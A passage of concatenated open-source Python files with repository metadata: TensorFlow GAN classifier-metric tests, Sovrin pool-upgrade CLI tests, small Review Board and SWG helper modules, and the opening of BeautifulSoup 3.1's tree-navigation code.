shape {
dim {
size: -1
}
dim {
size: 1001
}
}
}
}
}
node {
name: "pool_3"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
shape {
dim {
size: -1
}
dim {
size: 2048
}
}
}
}
}
versions {
producer: 24
}
"""
def _get_dummy_graphdef():
  """Parse `graphdef_string` into a fresh GraphDef proto."""
  graph_def = graph_pb2.GraphDef()
  text_format.Merge(graphdef_string, graph_def)
  return graph_def
def _run_with_mock(function, *args, **kwargs):
  """Call `function`, stubbing out the Inception tarball download.

  `get_graph_def_from_url_tarball` is patched to return the minimal dummy
  GraphDef so no network access happens during tests.
  """
  with mock.patch.object(
      classifier_metrics,
      'get_graph_def_from_url_tarball') as mock_tarball_getter:
    mock_tarball_getter.return_value = _get_dummy_graphdef()
    return function(*args, **kwargs)
class ClassifierMetricsTest(test.TestCase):
  """Graph-construction and value tests for TFGAN classifier metrics.

  All Inception-dependent pieces go through `_run_with_mock`, which swaps
  the downloaded frozen graph for the minimal placeholder GraphDef above.
  """
  def test_run_inception_graph(self):
    """Test `run_inception` graph construction."""
    batch_size = 7
    img = array_ops.ones([batch_size, 299, 299, 3])
    logits = _run_with_mock(classifier_metrics.run_inception, img)
    self.assertTrue(isinstance(logits, ops.Tensor))
    logits.shape.assert_is_compatible_with([batch_size, 1001])
    # Check that none of the model variables are trainable.
    self.assertListEqual([], variables.trainable_variables())
  def test_run_inception_graph_pool_output(self):
    """Test `run_inception` graph construction with pool output."""
    batch_size = 3
    img = array_ops.ones([batch_size, 299, 299, 3])
    pool = _run_with_mock(
        classifier_metrics.run_inception, img,
        output_tensor=classifier_metrics.INCEPTION_FINAL_POOL)
    self.assertTrue(isinstance(pool, ops.Tensor))
    pool.shape.assert_is_compatible_with([batch_size, 2048])
    # Check that none of the model variables are trainable.
    self.assertListEqual([], variables.trainable_variables())
  def test_inception_score_graph(self):
    """Test `inception_score` graph construction."""
    score = _run_with_mock(classifier_metrics.inception_score,
                           array_ops.zeros([6, 299, 299, 3]), num_batches=3)
    self.assertTrue(isinstance(score, ops.Tensor))
    score.shape.assert_has_rank(0)
    # Check that none of the model variables are trainable.
    self.assertListEqual([], variables.trainable_variables())
  def test_frechet_inception_distance_graph(self):
    """Test `frechet_inception_distance` graph construction."""
    img = array_ops.ones([7, 299, 299, 3])
    distance = _run_with_mock(
        classifier_metrics.frechet_inception_distance, img, img)
    self.assertTrue(isinstance(distance, ops.Tensor))
    distance.shape.assert_has_rank(0)
    # Check that none of the model variables are trainable.
    self.assertListEqual([], variables.trainable_variables())
  def test_run_inception_multicall(self):
    """Test that `run_inception` can be called multiple times."""
    for batch_size in (7, 3, 2):
      img = array_ops.ones([batch_size, 299, 299, 3])
      _run_with_mock(classifier_metrics.run_inception, img)
  def test_invalid_input(self):
    """Test that functions properly fail on invalid input."""
    with self.assertRaisesRegexp(ValueError, 'Shapes .* are incompatible'):
      classifier_metrics.run_inception(array_ops.ones([7, 50, 50, 3]))
    p = array_ops.zeros([8, 10])
    p_logits = array_ops.zeros([8, 10])
    q = array_ops.zeros([10])
    with self.assertRaisesRegexp(ValueError, 'must be floating type'):
      classifier_metrics._kl_divergence(
          array_ops.zeros([8, 10], dtype=dtypes.int32), p_logits, q)
    with self.assertRaisesRegexp(ValueError, 'must be floating type'):
      classifier_metrics._kl_divergence(
          p, array_ops.zeros([8, 10], dtype=dtypes.int32), q)
    with self.assertRaisesRegexp(ValueError, 'must be floating type'):
      classifier_metrics._kl_divergence(
          p, p_logits, array_ops.zeros([10], dtype=dtypes.int32))
    with self.assertRaisesRegexp(ValueError, 'must have rank 2'):
      classifier_metrics._kl_divergence(array_ops.zeros([8]), p_logits, q)
    with self.assertRaisesRegexp(ValueError, 'must have rank 2'):
      classifier_metrics._kl_divergence(p, array_ops.zeros([8]), q)
    with self.assertRaisesRegexp(ValueError, 'must have rank 1'):
      classifier_metrics._kl_divergence(p, p_logits, array_ops.zeros([10, 8]))
  def test_inception_score_value(self):
    """Test that `inception_score` gives the correct value."""
    logits = np.array([np.array([1, 2] * 500 + [4]),
                       np.array([4, 5] * 500 + [6])])
    unused_image = array_ops.zeros([2, 299, 299, 3])
    incscore = _run_with_mock(classifier_metrics.inception_score, unused_image)
    with self.test_session(use_gpu=True) as sess:
      incscore_np = sess.run(incscore, {'concat:0': logits})
    self.assertAllClose(_expected_inception_score(logits), incscore_np)
  def test_frechet_classifier_distance_value(self):
    """Test that `frechet_classifier_distance` gives the correct value."""
    np.random.seed(0)
    # Make num_examples > num_features to ensure scipy's sqrtm function
    # doesn't return a complex matrix.
    test_pool_real_a = np.float32(np.random.randn(512, 256))
    test_pool_gen_a = np.float32(np.random.randn(512, 256))
    fid_op = _run_with_mock(classifier_metrics.frechet_classifier_distance,
                            test_pool_real_a, test_pool_gen_a,
                            classifier_fn=lambda x: x)
    with self.test_session() as sess:
      actual_fid = sess.run(fid_op)
    expected_fid = _expected_fid(test_pool_real_a, test_pool_gen_a)
    self.assertAllClose(expected_fid, actual_fid, 0.0001)
  def test_trace_sqrt_product_value(self):
    """Test that `trace_sqrt_product` gives the correct value."""
    np.random.seed(0)
    # Make num_examples > num_features to ensure scipy's sqrtm function
    # doesn't return a complex matrix.
    test_pool_real_a = np.float32(np.random.randn(512, 256))
    test_pool_gen_a = np.float32(np.random.randn(512, 256))
    cov_real = np.cov(test_pool_real_a, rowvar=False)
    cov_gen = np.cov(test_pool_gen_a, rowvar=False)
    trace_sqrt_prod_op = _run_with_mock(classifier_metrics.trace_sqrt_product,
                                        cov_real, cov_gen)
    with self.test_session() as sess:
      # trace_sqrt_product: tsp
      actual_tsp = sess.run(trace_sqrt_prod_op)
    expected_tsp = _expected_trace_sqrt_product(cov_real, cov_gen)
    self.assertAllClose(actual_tsp, expected_tsp, 0.01)
  def test_preprocess_image_graph(self):
    """Test `preprocess_image` graph construction."""
    incorrectly_sized_image = array_ops.zeros([520, 240, 3])
    correct_image = classifier_metrics.preprocess_image(
        images=incorrectly_sized_image)
    _run_with_mock(classifier_metrics.run_inception,
                   array_ops.expand_dims(correct_image, 0))
  def test_get_graph_def_from_url_tarball(self):
    """Test `get_graph_def_from_url_tarball`."""
    # Write dummy binary GraphDef to tempfile.
    with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
      tmp_file.write(_get_dummy_graphdef().SerializeToString())
    relative_path = os.path.relpath(tmp_file.name)
    # Create gzip tarball.
    tar_dir = tempfile.mkdtemp()
    tar_filename = os.path.join(tar_dir, 'tmp.tar.gz')
    with tarfile.open(tar_filename, 'w:gz') as tar:
      tar.add(relative_path)
    with mock.patch.object(classifier_metrics, 'urllib') as mock_urllib:
      mock_urllib.request.urlretrieve.return_value = tar_filename, None
      graph_def = classifier_metrics.get_graph_def_from_url_tarball(
          'unused_url', relative_path)
    self.assertIsInstance(graph_def, graph_pb2.GraphDef)
    self.assertEqual(_get_dummy_graphdef(), graph_def)
# Standard TensorFlow test runner entry point.
if __name__ == '__main__':
  test.main()
| {
"content_hash": "efa7d0f05e05d9535d9cc18672b16165",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 99,
"avg_line_length": 30.847826086956523,
"alnum_prop": 0.6505587435819994,
"repo_name": "dyoung418/tensorflow",
"id": "92e0a995748c1c4c2ddfff0daae59be5a6eaefb4",
"size": "10622",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/gan/python/eval/python/classifier_metrics_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "155915"
},
{
"name": "C++",
"bytes": "9052366"
},
{
"name": "CMake",
"bytes": "29372"
},
{
"name": "CSS",
"bytes": "1297"
},
{
"name": "HTML",
"bytes": "763492"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "10779"
},
{
"name": "Jupyter Notebook",
"bytes": "1772913"
},
{
"name": "Protocol Buffer",
"bytes": "110178"
},
{
"name": "Python",
"bytes": "6032114"
},
{
"name": "Shell",
"bytes": "165125"
},
{
"name": "TypeScript",
"bytes": "403037"
}
],
"symlink_target": ""
} |
from copy import copy
import pytest
from sovrin_node.test import waits
from stp_core.loop.eventually import eventually
from plenum.common.constants import VERSION
from sovrin_common.constants import ACTION, CANCEL, JUSTIFICATION
from sovrin_node.test.upgrade.helper import checkUpgradeScheduled, \
checkNoUpgradeScheduled
from sovrin_node.test.upgrade.conftest import validUpgrade, validUpgradeExpForceFalse, validUpgradeExpForceTrue
def send_upgrade_cmd(do, expect, upgrade_data):
    """Issue a schedule-style POOL_UPGRADE CLI command and check its output."""
    command = ('send POOL_UPGRADE name={name} version={version} '
               'sha256={sha256} action={action} schedule={schedule} '
               'timeout={timeout}')
    do(command, within=10, expect=expect, mapper=upgrade_data)
@pytest.fixture(scope="module")
def poolUpgradeSubmitted(be, do, trusteeCli, validUpgrade):
    """Fixture: submit a valid POOL_UPGRADE from the trustee CLI."""
    be(trusteeCli)
    send_upgrade_cmd(do,
                     ['Sending pool upgrade',
                      'Pool Upgrade Transaction Scheduled'],
                     validUpgrade)
@pytest.fixture(scope="module")
def poolUpgradeScheduled(poolUpgradeSubmitted, poolNodesStarted, validUpgrade):
    """Fixture: wait until every node has the submitted upgrade scheduled."""
    nodes = poolNodesStarted.nodes.values()
    timeout = waits.expectedUpgradeScheduled()
    poolNodesStarted.looper.run(
        eventually(checkUpgradeScheduled, nodes,
                   validUpgrade[VERSION], retryWait=1, timeout=timeout))
@pytest.fixture(scope="module")
def poolUpgradeCancelled(poolUpgradeScheduled, be, do, trusteeCli,
                         validUpgrade):
    """Fixture: cancel the previously scheduled upgrade from the trustee CLI."""
    # Work on a shallow copy so the shared validUpgrade fixture data is
    # not mutated for other tests in the module.
    validUpgrade = copy(validUpgrade)
    validUpgrade[ACTION] = CANCEL
    validUpgrade[JUSTIFICATION] = '"not gonna give you one"'
    be(trusteeCli)
    do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
       'action={action} justification={justification}',
       within=10,
       expect=['Sending pool upgrade', 'Pool Upgrade Transaction Scheduled'],
       mapper=validUpgrade)
def test_pool_upgrade_rejected(be, do, newStewardCli, validUpgrade):
    """
    A pool upgrade submitted by a non-trustee (here, a steward) is rejected.
    """
    be(newStewardCli)
    err_msg = "Pool upgrade failed: client request invalid: " \
              "UnauthorizedClientRequest('STEWARD cannot do POOL_UPGRADE'"
    send_upgrade_cmd(do,
                     ['Sending pool upgrade',
                      err_msg],
                     validUpgrade)
def testPoolUpgradeSent(poolUpgradeScheduled):
    """Requesting the fixture is the whole test: it fails if the upgrade
    never gets scheduled on the nodes."""
    pass
def testPoolUpgradeCancelled(poolUpgradeCancelled, poolNodesStarted):
    """After the cancel action, no upgrade may remain scheduled on any node."""
    nodes = poolNodesStarted.nodes.values()
    timeout = waits.expectedNoUpgradeScheduled()
    poolNodesStarted.looper.run(
        eventually(checkNoUpgradeScheduled,
                   nodes, retryWait=1, timeout=timeout))
def send_force_false_upgrade_cmd(do, expect, upgrade_data):
    """Issue POOL_UPGRADE with an explicit force=False flag."""
    command = ('send POOL_UPGRADE name={name} version={version} '
               'sha256={sha256} action={action} schedule={schedule} '
               'timeout={timeout} force=False')
    do(command, within=10, expect=expect, mapper=upgrade_data)
def test_force_false_upgrade(
        be, do, trusteeCli, poolNodesStarted, validUpgradeExpForceFalse):
    """An upgrade sent with force=False still gets scheduled on all nodes."""
    be(trusteeCli)
    send_force_false_upgrade_cmd(do,
                                 ['Sending pool upgrade',
                                  'Pool Upgrade Transaction Scheduled'],
                                 validUpgradeExpForceFalse)
    poolNodesStarted.looper.run(
        eventually(
            checkUpgradeScheduled,
            poolNodesStarted.nodes.values(),
            validUpgradeExpForceFalse[VERSION],
            retryWait=1,
            timeout=10))
def send_force_true_upgrade_cmd(do, expect, upgrade_data):
    """Issue POOL_UPGRADE with an explicit force=True flag."""
    command = ('send POOL_UPGRADE name={name} version={version} '
               'sha256={sha256} action={action} schedule={schedule} '
               'timeout={timeout} force=True')
    do(command, within=10, expect=expect, mapper=upgrade_data)
def test_force_upgrade(be, do, trusteeCli, poolNodesStarted,
                       validUpgradeExpForceTrue):
    """A force=True upgrade is scheduled even when part of the pool is down.

    Two nodes are stopped first; only the remaining nodes are expected to
    have the upgrade scheduled.
    """
    nodes = poolNodesStarted.nodes.values()
    for node in nodes:
        if node.name in ["Delta", "Gamma"]:
            node.stop()
            poolNodesStarted.looper.removeProdable(node)
    be(trusteeCli)
    send_force_true_upgrade_cmd(
        do, ['Sending pool upgrade'], validUpgradeExpForceTrue)
    def checksched():
        # Stopped nodes are skipped; live nodes must show the new version.
        for node in nodes:
            if node.name not in ["Delta", "Gamma"]:
                assert node.upgrader.scheduledUpgrade
                assert node.upgrader.scheduledUpgrade[0] == validUpgradeExpForceTrue[VERSION]
    poolNodesStarted.looper.run(eventually(
        checksched, retryWait=1, timeout=10))
def send_reinstall_true_upgrade_cmd(do, expect, upgrade_data):
    """Issue POOL_UPGRADE with an explicit reinstall=True flag."""
    command = ('send POOL_UPGRADE name={name} version={version} '
               'sha256={sha256} action={action} schedule={schedule} '
               'timeout={timeout} reinstall=True')
    do(command, within=10, expect=expect, mapper=upgrade_data)
def send_reinstall_false_upgrade_cmd(do, expect, upgrade_data):
    """Issue POOL_UPGRADE with an explicit reinstall=False flag."""
    command = ('send POOL_UPGRADE name={name} version={version} '
               'sha256={sha256} action={action} schedule={schedule} '
               'timeout={timeout} reinstall=False')
    do(command, within=10, expect=expect, mapper=upgrade_data)
| {
"content_hash": "3aa61bebab34f3f9d4cf8aa0f8f4a55d",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 111,
"avg_line_length": 36.57142857142857,
"alnum_prop": 0.6689453125,
"repo_name": "keenondrums/sovrin-node",
"id": "1275d2b7c2dc58a0a91e25f05eec166ebacb0ddd",
"size": "5120",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sovrin_client/test/cli/test_pool_upgrade.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3195"
},
{
"name": "Python",
"bytes": "1088655"
},
{
"name": "Rust",
"bytes": "25532"
},
{
"name": "Shell",
"bytes": "15720"
}
],
"symlink_target": ""
} |
import pytest
import sys
from os import path
# Put the directory containing this tests directory at the front of
# sys.path so the package under test is importable without installation.
test_dir = path.dirname(path.realpath(__file__))
sys.path.insert(0, path.dirname(test_dir))
# Run the whole pytest suite when executed directly and propagate
# pytest's exit code to the shell.
if __name__ == '__main__':
    raise SystemExit(pytest.main())
| {
"content_hash": "dc9add4307a401466831ee6cdf350e5f",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 48,
"avg_line_length": 20.3,
"alnum_prop": 0.6798029556650246,
"repo_name": "six8/python-clom",
"id": "854c6628ed650cfe521d251cfdec146ef84b0b9c",
"size": "225",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/tests/runtests.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "4627"
},
{
"name": "Python",
"bytes": "41119"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django import template
# This will add the localsite tags as built-in tags, and override the existing
# {% url %} tag in Django.
# NOTE(review): `template.add_to_builtins` only exists in older Django
# releases (it was removed upstream) — verify the supported Django version
# before upgrading.
template.add_to_builtins(__name__ + '.localsite')
| {
"content_hash": "fe19fa9aadbb7130033b67c833de4dd8",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 78,
"avg_line_length": 28.375,
"alnum_prop": 0.7268722466960352,
"repo_name": "1tush/reviewboard",
"id": "88c59d9ba5206bd70d73c677e8e2a17a0b55c994",
"size": "227",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "reviewboard/site/templatetags/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "685"
},
{
"name": "C#",
"bytes": "340"
},
{
"name": "CSS",
"bytes": "157867"
},
{
"name": "Java",
"bytes": "340"
},
{
"name": "JavaScript",
"bytes": "1256833"
},
{
"name": "Objective-C",
"bytes": "288"
},
{
"name": "PHP",
"bytes": "278"
},
{
"name": "Perl",
"bytes": "103"
},
{
"name": "Python",
"bytes": "3124372"
},
{
"name": "Ruby",
"bytes": "172"
},
{
"name": "Shell",
"bytes": "963"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
    """Build the Tatooine Alkhara champion creature template object."""
    creature = Creature()
    creature.template = "object/mobile/shared_dressed_tatooine_alkhara_champion.iff"
    creature.attribute_template_id = 9
    creature.stfName("theme_park_name","alkhara_champion")
    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####
    return creature
"content_hash": "74df77fcef23bfea06d4c81c025b53ba",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 24.692307692307693,
"alnum_prop": 0.7102803738317757,
"repo_name": "obi-two/Rebelion",
"id": "60971b68df8d298c086db486ef02ac42b8d6cf86",
"size": "466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_tatooine_alkhara_champion.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation.
It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree.
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it.
Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
Here, have some legalese:
Copyright (c) 2004-2009, Leonard Richardson
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the the Beautiful Soup Consortium and All
Night Kosher Bakery nor the names of its contributors may be
used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.1.0.1"
__copyright__ = "Copyright (c) 2004-2009 Leonard Richardson"
__license__ = "New-style BSD"
import codecs
import markupbase
import types
import re
from HTMLParser import HTMLParser, HTMLParseError
# htmlentitydefs may be missing on minimal installs; fall back to an empty
# mapping so entity substitution degrades gracefully.
try:
    from htmlentitydefs import name2codepoint
except ImportError:
    name2codepoint = {}
# `set` is a builtin on modern Python 2; very old interpreters get it from
# the deprecated `sets` module.
try:
    set
except NameError:
    from sets import Set as set
#These hacks make Beautiful Soup able to parse XML with namespaces
markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
# Default encoding used when rendering a tree back out as a byte string.
DEFAULT_OUTPUT_ENCODING = "utf-8"
# First, the classes that represent markup elements.
def sob(unicode, encoding):
    """Return the given text unchanged, or encoded when an encoding is given.

    The first parameter deliberately keeps its historical name ``unicode``
    (it shadows the Python 2 builtin of the same name).
    """
    return unicode if encoding is None else unicode.encode(encoding)
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
    def setup(self, parent=None, previous=None):
        """Sets up the initial relations between this element and
        other elements."""
        self.parent = parent
        self.previous = previous
        self.next = None
        self.previousSibling = None
        self.nextSibling = None
        # If we already have a parent with children, this element becomes
        # the new last sibling: link it both ways.
        if self.parent and self.parent.contents:
            self.previousSibling = self.parent.contents[-1]
            self.previousSibling.nextSibling = self
    def replaceWith(self, replaceWith):
        """Replace this element in the tree with `replaceWith`, which may
        already be a sibling of this element."""
        oldParent = self.parent
        myIndex = self.parent.contents.index(self)
        if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
            # We're replacing this element with one of its siblings.
            index = self.parent.contents.index(replaceWith)
            if index and index < myIndex:
                # Furthermore, it comes before this element. That
                # means that when we extract it, the index of this
                # element will change.
                myIndex = myIndex - 1
        self.extract()
        oldParent.insert(myIndex, replaceWith)
    def extract(self):
        """Destructively rips this element out of the tree.

        Repairs both the parse-order chain (previous/next) and the sibling
        chain around the removed subtree, then returns self.
        """
        if self.parent:
            try:
                self.parent.contents.remove(self)
            except ValueError:
                pass
        #Find the two elements that would be next to each other if
        #this element (and any children) hadn't been parsed. Connect
        #the two.
        lastChild = self._lastRecursiveChild()
        nextElement = lastChild.next
        if self.previous:
            self.previous.next = nextElement
        if nextElement:
            nextElement.previous = self.previous
        self.previous = None
        lastChild.next = None
        self.parent = None
        # Splice this element out of its siblings' chain as well.
        if self.previousSibling:
            self.previousSibling.nextSibling = self.nextSibling
        if self.nextSibling:
            self.nextSibling.previousSibling = self.previousSibling
        self.previousSibling = self.nextSibling = None
        return self
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
    def insert(self, position, newChild):
        """Insert `newChild` into this element's contents at `position`.

        Plain strings are wrapped in NavigableString first.  All four
        navigation links (previous/next parse order and the sibling chain)
        are rewired for the inserted subtree.
        """
        if (isinstance(newChild, basestring)
            or isinstance(newChild, unicode)) \
            and not isinstance(newChild, NavigableString):
            newChild = NavigableString(newChild)
        position = min(position, len(self.contents))
        if hasattr(newChild, 'parent') and newChild.parent != None:
            # We're 'inserting' an element that's already one
            # of this object's children.
            if newChild.parent == self:
                index = self.find(newChild)
                if index and index < position:
                    # Furthermore we're moving it further down the
                    # list of this object's children. That means that
                    # when we extract this element, our target index
                    # will jump down one.
                    position = position - 1
            newChild.extract()
        newChild.parent = self
        previousChild = None
        if position == 0:
            newChild.previousSibling = None
            newChild.previous = self
        else:
            previousChild = self.contents[position-1]
            newChild.previousSibling = previousChild
            newChild.previousSibling.nextSibling = newChild
            newChild.previous = previousChild._lastRecursiveChild()
        if newChild.previous:
            newChild.previous.next = newChild
        newChildsLastElement = newChild._lastRecursiveChild()
        if position >= len(self.contents):
            # Appending at the end: the element after newChild in parse
            # order is the next sibling of the nearest ancestor that has one.
            newChild.nextSibling = None
            parent = self
            parentsNextSibling = None
            while not parentsNextSibling:
                parentsNextSibling = parent.nextSibling
                parent = parent.parent
                if not parent: # This is the last element in the document.
                    break
            if parentsNextSibling:
                newChildsLastElement.next = parentsNextSibling
            else:
                newChildsLastElement.next = None
        else:
            nextChild = self.contents[position]
            newChild.nextSibling = nextChild
            if newChild.nextSibling:
                newChild.nextSibling.previousSibling = newChild
            newChildsLastElement.next = nextChild
        if newChildsLastElement.next:
            newChildsLastElement.next.previous = newChildsLastElement
        self.contents.insert(position, newChild)
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.insert(len(self.contents), tag)
    def findNext(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the first item that matches the given criteria and
        appears after this Tag in the document."""
        # Thin wrapper: findAllNext with limit=1, unwrapped by _findOne.
        return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
    def findAllNext(self, name=None, attrs={}, text=None, limit=None,
                    **kwargs):
        """Returns all items that match the given criteria and appear
        after this Tag in the document."""
        # Walks the parse-order chain via nextGenerator.
        return self._findAll(name, attrs, text, limit, self.nextGenerator,
                             **kwargs)
    def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the closest sibling to this Tag that matches the
        given criteria and appears after this Tag in the document."""
        # Thin wrapper: findNextSiblings with limit=1, unwrapped by _findOne.
        return self._findOne(self.findNextSiblings, name, attrs, text,
                             **kwargs)
    def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
                         **kwargs):
        """Returns the siblings of this Tag that match the given
        criteria and appear after this Tag in the document."""
        return self._findAll(name, attrs, text, limit,
                             self.nextSiblingGenerator, **kwargs)
    # Legacy alias kept for callers written against the 2.x API.
    fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
    def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the first item that matches the given criteria and
        appears before this Tag in the document."""
        # Thin wrapper: findAllPrevious with limit=1, unwrapped by _findOne.
        return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
    def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
                        **kwargs):
        """Returns all items that match the given criteria and appear
        before this Tag in the document."""
        return self._findAll(name, attrs, text, limit, self.previousGenerator,
                             **kwargs)
    # Legacy alias kept for callers written against the 2.x API.
    fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
    """Return the closest earlier sibling of this element that
    matches the given criteria, or None."""
    finder = self.findPreviousSiblings
    return self._findOne(finder, name, attrs, text, **kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
                         limit=None, **kwargs):
    """Return the earlier siblings of this element that match the
    given criteria."""
    generator = self.previousSiblingGenerator
    return self._findAll(name, attrs, text, limit, generator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings  # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
    """Returns the closest parent of this Tag that matches the given
    criteria, or None.

    NOTE: _findOne can't be reused here because findParents takes a
    different set of arguments (it has no 'text' parameter).
    """
    r = None
    # BUG FIX: keyword criteria (e.g. findParent(align="center")) were
    # accepted by the signature but never forwarded, so they were
    # silently ignored; pass them through to findParents.
    l = self.findParents(name, attrs, 1, **kwargs)
    if l:
        r = l[0]
    return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
    """Return the ancestors of this element that match the given
    criteria (text criteria do not apply to parents)."""
    generator = self.parentGenerator
    return self._findAll(name, attrs, None, limit, generator, **kwargs)
fetchParents = findParents  # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _findAll(self, name, attrs, text, limit, generator, **kwargs):
    """Walk the nodes produced by 'generator', collecting everything
    the match criteria accept, up to 'limit' results."""
    if isinstance(name, SoupStrainer):
        strainer = name
    else:
        # Loose criteria: wrap them in a SoupStrainer.
        strainer = SoupStrainer(name, attrs, text, **kwargs)
    results = ResultSet(strainer)
    # The generators may yield a trailing None once they run off the
    # end of the document; skip any falsy node.
    for node in generator():
        if not node:
            continue
        found = strainer.search(node)
        if found:
            results.append(found)
            if limit and len(results) >= limit:
                break
    return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
    """Yield each element after this one, in document order.

    Note: the loop tests truthiness (not 'is None') on purpose --
    empty NavigableStrings are falsy and terminate the walk, matching
    the original behavior.  The final yield may be None.
    """
    node = self
    while node:
        node = node.next
        yield node
def nextSiblingGenerator(self):
    """Yield each later sibling of this element, nearest first.
    The final yield may be None (end of the sibling chain)."""
    node = self
    while node:
        node = node.nextSibling
        yield node
def previousGenerator(self):
    """Yield each element before this one, in reverse document order.
    The final yield may be None (start of the document)."""
    node = self
    while node:
        node = node.previous
        yield node
def previousSiblingGenerator(self):
    """Yield each earlier sibling of this element, nearest first.
    The final yield may be None (start of the sibling chain)."""
    node = self
    while node:
        node = node.previousSibling
        yield node
def parentGenerator(self):
    """Yield each ancestor of this element, nearest first.
    The final yield may be None (above the document root)."""
    node = self
    while node:
        node = node.parent
        yield node
# Utility methods
def substituteEncoding(self, str, encoding=None):
